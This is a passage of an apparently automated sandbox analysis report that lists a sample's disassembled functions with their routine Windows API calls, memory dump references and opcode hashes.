                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                                        • String ID:
                                                                        • API String ID: 1358664141-0
                                                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                        Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 2880819207-0
                                                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                        Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                        • String ID:
                                                                        • API String ID: 357397906-0
                                                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                        Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 0043392E
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • __wsplitpath.LIBCMT ref: 00433950
                                                                        • __wcsicoll.LIBCMT ref: 00433974
                                                                        • __wcsicoll.LIBCMT ref: 0043398A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                        • String ID:
                                                                        • API String ID: 1187119602-0
                                                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                        Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1597257046-0
                                                                        • Opcode ID: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                                                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                        • Opcode Fuzzy Hash: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                                                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                        Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                        • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                        • String ID:
                                                                        • API String ID: 237123855-0
                                                                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                        Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyObject$IconWindow
                                                                        • String ID:
                                                                        • API String ID: 3349847261-0
                                                                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                        Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                        • String ID:
                                                                        • API String ID: 2223660684-0
                                                                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                        Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                        • LineTo.GDI32(?,?,?), ref: 00447326
                                                                        • EndPath.GDI32(?), ref: 00447336
                                                                        • StrokePath.GDI32(?), ref: 00447344
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                        • String ID:
                                                                        • API String ID: 2783949968-0
                                                                        • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                        • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                        • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                        • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                        Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 2710830443-0
                                                                        • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                        • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                        • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                        • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                        Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                        • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                        • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                        • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                        Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 00472B63
                                                                        • GetDC.USER32(00000000), ref: 00472B6C
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                        • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                        • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                        • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                        Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 00472BB2
                                                                        • GetDC.USER32(00000000), ref: 00472BBB
                                                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                        • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                        • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                        • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                        Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __getptd_noexit.LIBCMT ref: 00415150
                                                                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                        • __freeptd.LIBCMT ref: 0041516B
                                                                        • ExitThread.KERNEL32 ref: 00415173
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 1454798553-0
                                                                        • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                        • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                        • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
